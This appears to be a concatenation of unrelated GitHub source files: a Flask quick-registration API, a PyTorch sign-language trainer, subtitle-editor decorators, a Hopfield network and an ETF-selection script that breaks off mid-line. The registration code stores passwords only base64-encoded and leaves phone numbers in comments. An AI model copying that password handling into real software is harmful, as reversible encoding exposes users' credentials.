'user_confirmation_code_data': fields.Nested(user_confirmation_code_fields),\n 'user_favorites_products': fields.Nested(user_favorites_products_fields)\n}\n# API METHODS FOR LIST ENTITIES\nclass QuickUserRegistrationResource(Resource):\n def __init__(self):\n self.route = ROUTE\n self.end_point = END_POINT\n pass\n\n @marshal_with(output_fields)\n def post(self):\n error_message = \"\"\n try:\n # send_user_phone = '+77077750095'\n # send_code = '0945'\n # sms_sender.send_sms(send_user_phone, send_code)\n\n json_data = request.get_json(force=True)\n\n phone_number = json_data['phone_number']\n\n user_login = session.query(UserLogins).filter(UserLogins.login==phone_number).first()\n\n if (user_login!=None):\n error_message = \"Пользователь с таким номером уже существует системе!\"\n abort(400, message=\"\")\n\n\n clients_args ={}\n clients_args[\"name\"] = json_data[\"client_name\"]\n clients_args[\"client_type_id\"] = 3\n client_entity = Clients(clients_args)\n session.add(client_entity)\n session.commit()\n\n client_id = client_entity.id\n\n client_info_args ={}\n client_info_args[\"client_id\"] = client_id\n client_info_entity = ClientInfo(client_info_args)\n session.add(client_info_entity)\n session.commit()\n\n users_args ={}\n users_args['name']=json_data[\"user_name\"]\n users_args['client_id']=client_id\n users_args['user_role_id']=4\n users_args['lock_state']=True\n user_entity = Users(users_args)\n session.add(user_entity)\n session.commit()\n\n user_login_args = {}\n user_login_args['user_id'] = user_entity.id\n user_login_args['login'] = phone_number\n user_login_args['password'] = str(base64.b64encode(bytes(json_data[\"password\"],\"utf-8\")))\n user_login_entity = UserLogins(user_login_args)\n session.add(user_login_entity)\n session.commit()\n\n user_info_args = {}\n user_info_args['user_id'] = user_entity.id\n user_info_args['phone_number'] ='+'+phone_number\n user_info_entity = UserInfo(user_info_args)\n session.add(user_info_entity)\n session.commit()\n\n user_confirmation_code_args = {}\n user_confirmation_code_args['user_id'] = user_entity.id\n user_confirmation_entity = UserConfirmationCodes(user_confirmation_code_args)\n session.add(user_confirmation_entity)\n session.commit()\n\n user_favorites_args = {}\n user_favorites_args['user_id'] = user_entity.id\n user_favorites_args['products_ids'] =[]\n user_favorites_entity = UserFavoriteProducts(user_favorites_args)\n session.add(user_favorites_entity)\n session.commit()\n\n\n user = session.query(Users).filter(Users.id==user_entity.id).first()\n user.user_confirmation_code_data = user_confirmation_entity\n user.user_favorites_products = user_favorites_entity\n if (not user):\n abort(400, message =\"Данные не найдены\")\n\n login = session.query(UserLogins).filter(UserLogins.user_id == user_entity.id).first()\n user_info = session.query(UserInfo).filter(UserInfo.user_id == user.id).first()\n user.user_login = login\n user.user_info_data = user_info\n\n send_user_phone = '+'+phone_number\n # send_user_phone = '+77077750095'\n # 77718961663\n send_code = str(user_confirmation_entity.code)\n sms_sender.send_sms(send_user_phone,send_code)\n return user, 201\n\n\n except Exception as e:\n session.rollback()\n abort(400, message=error_message, 
code=400)\n","repo_name":"vyadzmak/OTA.Api","sub_path":"cross_res/quick_user_registration_resources.py","file_name":"quick_user_registration_resources.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28267213505","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom tqdm import tqdm\n\nfrom Code.data.dataloaders import get_image_dataloader\nfrom Code.data.heb_data import create_street_names_data_iterators\nfrom Code.data.hybrid_data import HybridDataSet\nfrom Code.models.heb_model import HebLetterToSentence\nfrom Code.models.hybrid_model import HybridModel\nfrom Code.trianer.train_images import Trainer\nfrom Code.utils.helpers import load_resnet_model\n\n\nclass HybridTrainer(Trainer):\n def __init__(self, train_dataloader, eval_dataloader, model, optim, summary_writer,\n criteria=torch.nn.CrossEntropyLoss().cuda(), save_checkpoint=200,device='cuda'):\n super(HybridTrainer, self).__init__(train_dataloader, eval_dataloader, model, optim, summary_writer,\n criteria=criteria, save_checkpoint=save_checkpoint)\n\n self.device = device\n\n\n def train_epoch(self):\n avg_loss = 0\n for x, y in tqdm(self.train_dataloader):\n self.model.train()\n self.optim.zero_grad()\n x, y = x.to(self.device), y.to(self.device)\n y_hat, _ = self.model(x)\n loss = self.criteria(y_hat.squeeze(1), y)\n avg_loss += loss.item()\n loss.backward()\n self.optim.step()\n return avg_loss / len(self.train_dataloader)\n\n\n\n def log_epoch(self, acc_log, avg_loss, device, epoch, loss_log, summary_writer):\n # display\n # acc_test = accuracy(self.model, self.eval_dataloader, device)\n # acc_train = accuracy(self.model, self.train_dataloader, device)\n print(f\"loss[{epoch}] = {avg_loss / self.train_size}\")\n # print(f\"acc[{epoch}] = {acc_test.item()}\")\n loss_log.append(avg_loss / self.train_size)\n summary_writer.add_scalar(\"loss_train_text\", avg_loss, global_step=epoch)\n # summary_writer.add_scalar(\"accuracy_test\", acc_test.item(), global_step=epoch)\n # summary_writer.add_scalar(\"accuracy_train\",acc_train.item())\n # acc_log.append(acc_test)\n\n\nif __name__ == '__main__':\n use_gpu = True\n device = torch.device(\"cuda:0\" if use_gpu and torch.cuda.is_available() else \"cpu\")\n path_to_data = \"D:\\\\Alon_temp\\\\singlang\\\\singLang_DLProg\\\\images\\\\coloredCaptureData\"\n _,imageDataSet = get_image_dataloader(path_to_data, batch_size=16)\n\n # path = \"C:\\\\HW\\\\singLang_DLProg\\\\text_data\\\\split\"\n path = \"D:\\\\Alon_temp\\\\singlang\\\\singLang_DLProg\\\\text_data\\\\split\"\n\n train_iterator, test_iterator,vocab_letters,vocab_words,train_data,test_data = create_street_names_data_iterators(path)\n\n hybridDataSet = HybridDataSet(imageDataSet,test_data,vocab_words)\n dataloader = DataLoader(dataset=hybridDataSet, batch_size=2, shuffle=True)\n # someItem = hybridDataSet.__getitem__(2)\n # print(someItem[0].shape)\n # print(hybridDataSet.word_max_len)\n # def __init__(self, vocab_size,embedding_dim, lstm_size,hidden_dim, output_dim):\n\n text_model = HebLetterToSentence(len(vocab_letters), 128, 512, 128,len(vocab_words),use_self_emmbed=True)\n image_model = load_resnet_model('')\n\n\n model = HybridModel(image_model,text_model).to(device)\n optimizer = torch.optim.Adam(model.parameters(),lr=0.001)\n\n writer = SummaryWriter(comment=\"full_train\")\n # print(model)\n # x,y = next(iter(dataloader))\n # print(model(x))\n trainer = 
HybridTrainer(dataloader, test_iterator, model, optimizer, writer,save_checkpoint=5,device=device)\n\n trainer.train(\"full_run_test\",epochs=100, device=device)\n\n\n\n# import os\n# from random import uniform, random, choice, sample\n# import os\n# # from torchtext.data import Field, BucketIterator, TabularDataset\n# # from tensorflow.contrib.learn.python.learn.datasets.mnist import DataSet\n# import torch\n# from torch.utils.data import DataLoader,Dataset\n# from Code.data.dataloaders import get_image_dataloader\n# from Code.data.heb_data import create_street_names_data_iterators\n# from Code.models.resnet import SingLangResNet\n# import matplotlib.pyplot as plt\n#\n# class HybridDataSet(Dataset):\n#\n# def __init__(self,imageDataSet,textDataSet):\n# self.textDataSet = textDataSet\n# self.imageDataSet = imageDataSet\n# self.labelImageIndexDic = self.createletterToIndexDic()\n# self.word_max_len = self.get_max_len()\n# '''\n# create mapping between letter to the matching image index in the dataset\n# '''\n# def createletterToIndexDic(self):\n# dic ={}\n# max_size = -1\n# for i in range(len(self.imageDataSet)):\n# image,letter = self.imageDataSet[i]\n# if letter in dic.keys():\n# dic[self.imageDataSet.classes[letter]].append(i)\n# else:\n# dic[self.imageDataSet.classes[letter]] = [i]\n# return dic\n#\n# def __len__(self):\n# return len(self.textDataSet)\n#\n# def __getitem__(self, item):\n# textItem = self.textDataSet[item]\n# imagesIndexes = []\n# for hebLetter in textItem.chars:\n# engLetter = self.hebToEngConvertor(hebLetter)\n# imageIndexes = self.labelImageIndexDic[engLetter]\n# randomImage = choice(imageIndexes)\n#\n# imagesIndexes.append(randomImage)\n#\n# # add padding\n# for i in range(self.word_max_len - len(textItem.chars)):\n# engLetter = self.hebToEngConvertor('pad')\n# imageIndexes = self.labelImageIndexDic[engLetter]\n# randomImage = choice(imageIndexes)\n#\n# imagesIndexes.append(randomImage)\n# # image, letter = self.imageDataSet[randomImage]\n# # plt.imshow(image.squeeze(0).permute(1,2,0).numpy())\n# # print(hebLetter)\n# # plt.show()\n# # imagesFromDataSet = []\n# # for index in imagesIndexes:\n# # images, letters = self.imageDataSet[index]\n# # print(images.shape)\n# # break\n# # imagesFromDataSet.append(images)\n# imagesFromDataSet = torch.cat([self.imageDataSet[index][0].unsqueeze(0) for index in imagesIndexes],dim=0)\n# return imagesFromDataSet,textItem.names\n#\n# def hebToEngConvertor(self,x):\n# return {\n# 'א': 'A',\n# 'ב': 'B',\n# 'ג': 'C',\n# 'ד': 'D',\n# 'ה': 'E',\n# 'ו': 'F',\n# 'ז': 'G',\n# 'ח': 'H',\n# 'ט': 'I',\n# 'י': 'J',\n# 'כ': 'K',\n# 'ך': 'K',\n# 'ל': 'L',\n# 'מ': 'M',\n# 'נ': 'N',\n# 'ן': 'N',\n# 'ס': 'O',\n# 'ע': 'P',\n# 'פ': 'Q',\n# 'ף': 'Q',\n# 'צ': 'R',\n# 'ץ': 'R',\n# 'ק': 'S',\n# 'ר': 'T',\n# 'ש': 'U',\n# 'ת': 'V',\n# 'pad': 'W',\n# }[x]\n#\n# def get_max_len(self):\n# max_len = -1\n# for s in self.textDataSet:\n# if len(s.chars) > max_len:\n# max_len = len(s.chars)\n# return max_len\n#\n#\n#\n# if __name__ == '__main__':\n# # path_to_data = \"C:\\HW\\singLang_DLProg\\images\\coloredCaptureData_debug\"\n# path_to_data = \"D:\\\\Alon_temp\\\\singlang\\\\singLang_DLProg\\\\images\\\\coloredCaptureData_debug\"\n# _,imageDataSet = get_image_dataloader(path_to_data, batch_size=16)\n#\n# # path = \"C:\\\\HW\\\\singLang_DLProg\\\\text_data\\\\split\"\n# path = \"D:\\\\Alon_temp\\\\singlang\\\\singLang_DLProg\\\\text_data\\\\split\"\n#\n# train_iterator, test_iterator,_,_,train_data,test_data = create_street_names_data_iterators(path)\n#\n# 
hybridDataSet = HybridDataSet(imageDataSet,test_data)\n# dataloader = DataLoader(dataset=hybridDataSet, batch_size=16, shuffle=True)\n# someItem = hybridDataSet.__getitem__(2)\n# print(someItem[0].shape)\n# print(hybridDataSet.word_max_len)\n","repo_name":"alonshoa/signLang_DLProg","sub_path":"Code/trianer/hybrid_train.py","file_name":"hybrid_train.py","file_ext":"py","file_size_in_byte":7946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21999287466","text":"import aeidon\nimport collections\nimport copy\nimport functools\nimport pickle\nimport time\n\n# Python decorators normally do not preserve the signature of the original\n# function. We, however, absolutely need those function signatures kept to able\n# to autogenerate useful API documentation with sphinx. Let's use the\n# 'decorator' module [1] designed to solve this problem, but only if running\n# sphinx in order to avoid an unnecessary dependency and to avoid an additional\n# layer of code with its own runtime speed penalty and potential bugs.\n# Specifically, let's use the 'decorator_apply' function as instructed [2] to\n# avoid rewriting our standard-form decorators.\n#\n# [1] http://pypi.python.org/pypi/decorator/\n# [2] http://micheles.googlecode.com/hg/decorator/documentation.html\n\n\ndef _dump_subtitles(subtitles):\n \"\"\"Return a tuple of essential attributes of subtitles.\"\"\"\n return tuple((subtitle._start,\n subtitle._end,\n subtitle._main_text,\n subtitle._tran_text,\n subtitle._framerate) for subtitle in subtitles)\n\ndef _hasattr_def(obj, name):\n \"\"\"Return ``True`` if `obj` has attribute `name` defined.\"\"\"\n if hasattr(obj, \"__dict__\"):\n return name in obj.__dict__\n return hasattr(obj, name)\n\ndef _is_method(function, args):\n \"\"\"\n Return ``True`` if `function` to be decorated is a method.\n\n Decorator is required to have set an `original` attribute on the wrapped\n method pointing to the original unwrapped function.\n \"\"\"\n try:\n method = getattr(args[0], function.__name__)\n return (method.original is function)\n except (IndexError, AttributeError):\n return False\n\ndef benchmark(function):\n \"\"\"Decorator for benchmarking functions and methods.\"\"\"\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n start = time.time()\n value = function(*args, **kwargs)\n duration = time.time() - start\n print(\"{:7.3f} {}\".format(duration, function.__name__))\n return value\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _benchmark = benchmark\n def benchmark(function):\n return decorator_apply(_benchmark, function)\n benchmark.__doc__ = _benchmark.__doc__\n\ndef contractual(function):\n \"\"\"\n Decorator for module level functions with pre- and/or postconditions.\n\n `function` call will be wrapped around ``FUNCTION_NAME_require`` and\n ``FUNCTION_NAME_ensure`` calls if such functions exist. The require\n function receives the same arguments as function, the ensure function will\n in addition receive function's return value as its first argument. 
This is\n a debug decorator that does nothing unless :data:`aeidon.DEBUG` is\n ``True``.\n \"\"\"\n if not aeidon.DEBUG:\n return function\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n name = \"{}_require\".format(function.__name__)\n if name in function.__globals__:\n function.__globals__[name](*args, **kwargs)\n value = function(*args, **kwargs)\n name = \"{}_ensure\".format(function.__name__)\n if name in function.__globals__:\n function.__globals__[name](value, *args, **kwargs)\n return value\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _contractual = contractual\n def contractual(function):\n return decorator_apply(_contractual, function)\n contractual.__doc__ = _contractual.__doc__\n\ndef decorator_apply(dec, fun):\n \"\"\"Rewrap `dec` to preserve function signature.\"\"\"\n import decorator\n return decorator.FunctionMaker.create(\n fun, 'return decorated(%(signature)s)',\n dict(decorated=dec(fun)), __wrapped__=fun)\n\ndef export(function):\n \"\"\"Decorator for delegate functions that are exported to master.\"\"\"\n function.export = True\n return function\n\nif aeidon.RUNNING_SPHINX:\n _export = export\n def export(function):\n return decorator_apply(_export, function)\n export.__doc__ = _export.__doc__\n\ndef memoize(limit=100):\n \"\"\"\n Decorator for functions that cache their return values.\n\n Use ``None`` for `limit` for a boundless cache.\n \"\"\"\n def outer_wrapper(function):\n cache = collections.OrderedDict()\n @functools.wraps(function)\n def inner_wrapper(*args, **kwargs):\n params = (args, kwargs)\n if _is_method(function, args):\n params = (id(args[0]), args[1:], kwargs)\n key = pickle.dumps(params)\n try: return cache[key]\n except KeyError: pass\n cache[key] = function(*args, **kwargs)\n if limit is not None:\n while len(cache) > limit:\n cache.popitem(last=False)\n return cache[key]\n inner_wrapper.original = function\n return inner_wrapper\n if aeidon.RUNNING_SPHINX:\n _outer_wrapper = outer_wrapper\n def outer_wrapper(function):\n return decorator_apply(_outer_wrapper, function)\n return outer_wrapper\n\ndef monkey_patch(obj, name):\n \"\"\"\n Decorator for functions that change `obj`'s `name` attribute.\n\n Any changes done will be reverted after the function is run, i.e. `name`\n attribute is either restored to its original value or deleted, if it didn't\n originally exist. The attribute in question must be able to correctly\n handle a :func:`copy.deepcopy` operation.\n\n Typical use would be unit testing code under legitimately unachievable\n conditions, e.g. 
pseudo-testing behaviour on Windows, while not actually\n using Windows::\n\n @aeidon.deco.monkey_patch(sys, \"platform\")\n def test_do_something():\n sys.platform = \"win32\"\n do_something()\n\n \"\"\"\n def outer_wrapper(function):\n @functools.wraps(function)\n def inner_wrapper(*args, **kwargs):\n if _hasattr_def(obj, name):\n attr = getattr(obj, name)\n setattr(obj, name, copy.deepcopy(attr))\n try: return function(*args, **kwargs)\n finally:\n setattr(obj, name, attr)\n assert getattr(obj, name) == attr\n assert getattr(obj, name) is attr\n else: # Attribute not defined.\n try: return function(*args, **kwargs)\n finally:\n delattr(obj, name)\n assert not _hasattr_def(obj, name)\n return inner_wrapper\n if aeidon.RUNNING_SPHINX:\n _outer_wrapper = outer_wrapper\n def outer_wrapper(function):\n return decorator_apply(_outer_wrapper, function)\n return outer_wrapper\n\ndef notify_frozen(function):\n \"\"\"Decorator for methods to be run in notify frozen state.\"\"\"\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n frozen = args[0].freeze_notify()\n try: return function(*args, **kwargs)\n finally: args[0].thaw_notify(frozen)\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _notify_frozen = notify_frozen\n def notify_frozen(function):\n return decorator_apply(_notify_frozen, function)\n notify_frozen.__doc__ = _notify_frozen.__doc__\n\ndef once(function):\n \"\"\"Decorator for functions that cache their only return value.\"\"\"\n cache = []\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n try: return cache[0]\n except IndexError: pass\n cache.append(function(*args, **kwargs))\n return cache[0]\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _once = once\n def once(function):\n return decorator_apply(_once, function)\n once.__doc__ = _once.__doc__\n\ndef reversion_test(function):\n \"\"\"Decorator for unit testing reversions of one action.\"\"\"\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n project = args[0].project\n original = _dump_subtitles(project.subtitles)\n value = function(*args, **kwargs)\n changed = _dump_subtitles(project.subtitles)\n assert changed != original\n for i in range(2):\n project.undo()\n current = _dump_subtitles(project.subtitles)\n assert current == original\n project.redo()\n current = _dump_subtitles(project.subtitles)\n assert current == changed\n return value\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _reversion_test = reversion_test\n def reversion_test(function):\n return decorator_apply(_reversion_test, function)\n reversion_test.__doc__ = _reversion_test.__doc__\n\ndef revertable(function):\n \"\"\"Decorator for revertable methods of :class:`aeidon.Project`.\"\"\"\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n project = args[0]\n main_changed = project.main_changed\n tran_changed = project.tran_changed\n kwargs.setdefault(\"register\", aeidon.registers.DO)\n register = kwargs[\"register\"]\n if register is None:\n # Execute plain function for special-case actions\n # that are not to be pushed to the undo stack.\n return function(*args, **kwargs)\n blocked = project.block(register.signal)\n if not blocked:\n # Execute plain function for nested function calls\n # that are part of another revertable action.\n return function(*args, **kwargs)\n try: value = function(*args, **kwargs)\n finally: project.unblock(register.signal)\n project.cut_reversion_stacks()\n if (project.main_changed != main_changed or\n project.tran_changed != tran_changed):\n project.emit_action_signal(register)\n return 
value\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _revertable = revertable\n def revertable(function):\n return decorator_apply(_revertable, function)\n revertable.__doc__ = _revertable.__doc__\n\ndef silent(*exceptions):\n \"\"\"\n Decorator for ignoring `exceptions` raised by function.\n\n If no exceptions specified, ignore :exc:`Exception`.\n Return ``None`` if an exception encountered.\n \"\"\"\n if not exceptions:\n exceptions = (Exception,)\n def outer_wrapper(function):\n @functools.wraps(function)\n def inner_wrapper(*args, **kwargs):\n try: return function(*args, **kwargs)\n except exceptions: return None\n return inner_wrapper\n if aeidon.RUNNING_SPHINX:\n _outer_wrapper = outer_wrapper\n def outer_wrapper(function):\n return decorator_apply(_outer_wrapper, function)\n return outer_wrapper\n","repo_name":"unho/gaupol","sub_path":"aeidon/deco.py","file_name":"deco.py","file_ext":"py","file_size_in_byte":10549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"14455268717","text":"def konversi(x):\n if x == 1 or x == 0:\n return x\n\n panjang = len(str(x))\n AngkaPertama = x//pow(10, panjang-1)\n\n return (pow(2, panjang-1) * AngkaPertama) + konversi(x % pow(10, panjang-1))\n\nwhile True:\n Biner = int(input('Masukkan Biner : '))\n Desimal = konversi(Biner)\n\n print(\"Desimal dari\", Biner, 'adalah', Desimal)","repo_name":"melvin0507/Python-XI5-MelvinWaluyo","sub_path":"28 Januari 2021/Program 5.py","file_name":"Program 5.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19204175889","text":"import time\nimport os\nimport numpy as np\nimport torch\nimport torchvision\nfrom torch import Tensor, nn\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\n\nimport logging\n\nlogging.basicConfig()\nlogging.basicConfig(level=logging.NOTSET)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\ndataset = torchvision.datasets.MNIST(os.getcwd() + \"/files/MNIST/\", train=True, download=True)\n\n\nclass HopfieldNetwork:\n def __init__(self, n_neurons):\n self.sanity_check(n_neurons)\n self.n_neurons = n_neurons\n sqrt = int(np.sqrt(n_neurons))\n self.shape = (sqrt, sqrt)\n self.state = self.get_random_pattern()\n self.weights = np.zeros((self.n_neurons, self.n_neurons))\n self.patterns = None\n\n def get_activation(self, i):\n # get activation value of neuron at index i\n weights_to_neuron = self.weights[:, i]\n activation = sum(weights_to_neuron * self.state)\n return activation\n\n def update(self, i):\n # update neurons at index i\n if self.get_activation(i) >= 0:\n self.state[i] = 1\n else:\n self.state[i] = -1\n\n def run(self, steps):\n # without replacement\n start = time.time()\n if steps < self.n_neurons:\n indices = np.random.choice(range(self.n_neurons), steps, replace=False)\n else:\n indices = sorted(np.arange(steps), key=lambda k: np.random.random())\n for i in indices:\n while i >= self.n_neurons:\n i -= self.n_neurons\n self.update(i)\n logger.debug(f\"Made {steps} in {int(time.time() - start)} seconds.\")\n\n def solve(self):\n start = time.time()\n while not self.is_in_local_minima():\n self.run(self.n_neurons)\n logger.debug(f\"Solved in {int(time.time() - start)} seconds.\")\n\n def train(self):\n start = time.time()\n i, j = 0, 0\n stop = self.n_neurons - 1\n shown = {}\n\n while i != stop or j != stop:\n if j < stop:\n j += 1\n elif j == stop:\n j = 0\n i += 1\n if (i, j) in 
shown or i == j:\n continue\n else:\n shown[(j, i)] = None\n hebb_sum = np.mean(self.patterns[i, :] * self.patterns[j, :])\n self.weights[i, j] = hebb_sum\n self.weights[j, i] = hebb_sum\n logger.debug(f\"Trained Network in {int(time.time()-start)} seconds.\")\n\n def is_in_local_minima(self):\n for i in range(self.n_neurons):\n activation = self.get_activation(i)\n if activation >= 0:\n proper_state = 1\n else:\n proper_state = -1\n if self.state[i] != proper_state:\n return False\n return True\n\n def sanity_check(self, n_neurons):\n if n_neurons < 4:\n raise ValueError(f\"n_neurons provided is: {n_neurons} but must be at least 4\")\n sqrt = np.sqrt(n_neurons)\n if not sqrt.is_integer():\n raise ValueError(f\"n_neurons provided is: {n_neurons} but must be divisible by itself to an int\")\n if n_neurons < 100:\n logger.warning(\"We recommend to choose n_neurons to be >= 100 to ensure proper generation of characters.\")\n\n def is_saved(self, pattern):\n if self.patterns is None:\n return False\n for i in range(self.patterns.shape[1]):\n if (self.patterns[:, i] == pattern).all():\n return True\n return False\n\n def get_pattern_index(self, pattern):\n for i in range(self.patterns.shape[1]):\n if (self.patterns[:, i] == pattern).all():\n return i\n raise RuntimeError(\"Pattern is not saved.\")\n\n def save_pattern(self, pattern):\n if self.patterns is None:\n self.patterns = pattern.reshape(-1, 1)\n else:\n self.patterns = np.concatenate((self.patterns, pattern.reshape(-1, 1)), axis=1)\n\n def get_random_pattern(self):\n return np.random.choice((-1, 1), self.n_neurons)\n\n def get_number_pattern(self, number):\n while True:\n img, n = dataset[np.random.randint(len(dataset))]\n if n == number:\n break\n img = img.resize(self.shape)\n array = np.asarray(img)\n array = np.round(array / 255)\n array[array == 0] = -1\n return array.flatten()\n\n def visualize_array(self, array):\n fig = Figure(figsize=(3, 3), dpi=100)\n plot = fig.add_subplot(111)\n plot.imshow(array, cmap=\"Blues\", interpolation=\"nearest\")\n fig.axes[0].get_xaxis().set_visible(False)\n fig.axes[0].get_yaxis().set_visible(False)\n return fig\n\n def visualize_weight_matrix(self):\n fig = self.visualize_array(self.weights)\n dummy = plt.figure()\n new_manager = dummy.canvas.manager\n new_manager.canvas.figure = fig\n fig.set_canvas(new_manager.canvas)\n fig.show()\n\n def visualize(self, pattern=None):\n if pattern is None:\n pattern = self.state\n pattern = np.reshape(pattern, self.shape)\n return self.visualize_array(pattern)","repo_name":"kheuer/hopfield_network_portfolio","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38806399391","text":"from usefulTools import *\nimport FundApi\n\n# 每一期筛选2个ETF作为该行业的备选\ndef ETF_all_select(start_date, end_date, trading_fund=True, min_size = 0.5):\n ETF_name = FundApi.get_fund_name()\n test_start_date, test_end_date = get_pre_trade_date(start_date,240), end_date\n date_list = get_date_range(test_start_date, test_end_date)\n month_date_list = [get_pre_trade_date(x, offset=-1) if get_pre_trade_date(x, offset=-1) < end_date else end_date for x in\n get_date_range(start_date, end_date, period='M')]\n fund_tracking_index = FundApi.get_fund_1factor('fund_tracking_index', date_list=date_list) # 跟踪的指数\n if trading_fund == True:\n market_trade_fund = FundApi.get_fund_1factor('market_trade_fund', date_list=date_list).dropna(how='all', axis=1)\n 
fund_apply = FundApi.get_fund_1factor('fund_apply', date_list=date_list)[market_trade_fund.columns].dropna(how='all',axis=1)\n stock_fund = FundApi.get_fund_1factor('fund_type', date_list=date_list)[fund_apply.columns] == 1\n stock_fund = stock_fund.replace(False,np.nan).dropna(how='all',axis=1)\n\n fund_tracking_index = fund_tracking_index[stock_fund.columns][(market_trade_fund==True) & (fund_apply) & stock_fund]\n\n fund_NA = FundApi.get_fund_1factor('fund_NA', date_list=date_list).iloc[-1] / 1e8\n\n bench_close = get_daily_1factor('close',date_list=date_list,type='bench')['wind_A']\n bench_pct = bench_close.pct_change(1)\n fund_close = FundApi.get_fund_1factor('net_value_badj', date_list=date_list)\n fund_pct = fund_close.pct_change(1)\n fund_setup = (~fund_pct.isna()).cumsum() # 具备净值的时间\n ind = 'sw_all1'\n ind_name = get_ind_con(ind[:-1], int(ind[-1]))\n ind_name = pd.Series(ind_name)\n\n sw_close = get_daily_1factor('close',date_list=date_list, code_list=ind_name.index.to_list(), type='SW').dropna(how='all',axis=1)\n sw_pct = sw_close.pct_change(1)\n # 月度收益率\n ETF_pct20, SW_pct20 = fund_close.loc[month_date_list].pct_change(), sw_close.loc[month_date_list].pct_change()\n\n # ETF和申万行业的超额收益率\n ind_excess_pct = sw_pct.sub(bench_pct, axis=0).dropna()\n fund_excess_pct = fund_pct.sub(bench_pct, axis=0).loc[ind_excess_pct.index,fund_tracking_index.columns]\n\n # 获取行业对应的ETF,以及没有任何指数或行业对应的ETF\n ind_use_ETF = pd.DataFrame(index = sw_close.columns, columns =fund_tracking_index.columns)\n for industry in sw_pct.columns:\n ind_useful_ETF = fund_tracking_index[fund_tracking_index == industry].dropna(how='all',axis=1).columns.to_list()\n ind_use_ETF.loc[industry,ind_useful_ETF] = True\n # 再将一些对标指数的进行剔除\n no_ind_ETF = ind_use_ETF.isna().sum()[ind_use_ETF.isna().sum() == 32].index.to_list()\n no_ind_ETF = fund_tracking_index[no_ind_ETF].isna().sum() >= len(no_ind_ETF)\n\n\n all_ETF_ind = pd.DataFrame(index=date_list, columns=fund_pct.columns)\n select_ETF_ind = pd.DataFrame(index=date_list, columns=fund_pct.columns)\n for industry in tqdm(sw_pct.columns):\n # 第一步:先选取行业对应的ETF,和没有任何行业对应的ETF\n test_ETF = ind_use_ETF.loc[industry][ind_use_ETF.loc[industry]==True].index.to_list()\n test_ETF = set(test_ETF).union(no_ind_ETF[no_ind_ETF==True].index)\n\n # 开始滚动计算过去1年走势的而相关性\n _trans_IND = pd.concat([ind_excess_pct[[industry]] for x in test_ETF],axis=1)\n ETF_corr = rolling_corr(fund_excess_pct[test_ETF],_trans_IND,window=252)\n\n # 绝对值筛选:走势相关性必须再80%以上,上市时间必须在120日以上\n ETF_uesful = (ETF_corr > 0.8) & (fund_setup > 120) & (fund_NA > min_size)\n ETF_uesful = ETF_uesful[ETF_uesful==True].dropna(how='all',axis=1)\n\n ind_ETF = ETF_uesful.columns.to_list()\n\n if len(ind_ETF) > 0:\n # ------------- 开始对比和筛选 ----------------- #\n corr = ETF_corr[ind_ETF][ETF_uesful==True] # 走势相关性\n sharpe = fund_pct[ind_ETF].rolling(252,min_periods=120).mean() / fund_pct[ind_ETF].rolling(252,min_periods=120).std()\n excess_sharpe = (fund_pct[ind_ETF].T - sw_pct[industry]).T.rolling(252,min_periods=120).mean() / (fund_pct[ind_ETF].T - sw_pct[industry]).T.rolling(252,min_periods=120).std()\n # 跟踪误差\n trading_error = (fund_pct[ind_ETF].T - sw_pct[industry]).T.rolling(252, min_periods=120).std() * np.sqrt(252)\n trading_error20 = ETF_pct20[ind_ETF].sub(SW_pct20[industry],axis=0).rolling(int(240/12),min_periods=6).std() * np.sqrt(12)\n trading_error20 = trading_error20.reindex(date_list).ffill()\n # 实际跟踪收益率误差\n tracking_difference = abs(ETF_pct20[ind_ETF].T - SW_pct20[industry]).T.rolling(int(240/12),min_periods=6).mean()\n 
tracking_difference = tracking_difference.reindex(date_list).ffill()\n\n # ---------------- 开始进行对比 ----------------------- #\n abs_similar = (corr > 0.9) & (trading_error <= 0.05) & (trading_error20 <= 0.07)\n\n # ---------------- 相对需求 ---------------------------- #\n corr_rank = corr.rank(ascending=False,axis=1)\n sharpe_rank,excess_sharpe_rank = sharpe.rank(ascending=False,axis=1), excess_sharpe.rank(ascending=False,axis=1)\n trading_error_rank = trading_error.rank(ascending=True,axis=1)\n trading_error20_rank = trading_error20.rank(ascending=True,axis=1)\n tracking_difference_rank = tracking_difference.rank(ascending=True,axis=1)\n\n relative_similar = (corr_rank <= round(len(ind_ETF) / 2 + 0.01)) & (trading_error_rank <= round(len(ind_ETF) / 2 + 0.01)) & \\\n (trading_error20_rank <= round(len(ind_ETF) / 2 + 0.01))\n\n all_select = relative_similar | abs_similar\n all_ETF_ind[all_select==True] = industry\n # --- 剔除原有的结果 --- #\n del_ind = all_select.sum()[all_select.sum() >0].index.to_list()\n no_ind_ETF.loc[set(del_ind).intersection(no_ind_ETF.index)] = False\n # --------------------- 开始进行筛选 -----------------------#\n select_result = (corr_rank + sharpe_rank + excess_sharpe_rank + trading_error_rank + trading_error20_rank + tracking_difference_rank) / 6\n # 选择排名最高的前2个\n ETF = (select_result[all_select].rolling(20).mean().rank(ascending=False, method='min',axis=1) <= 2)\n\n select_ETF_ind[ETF == True] = industry\n\n all_ETF_ind = 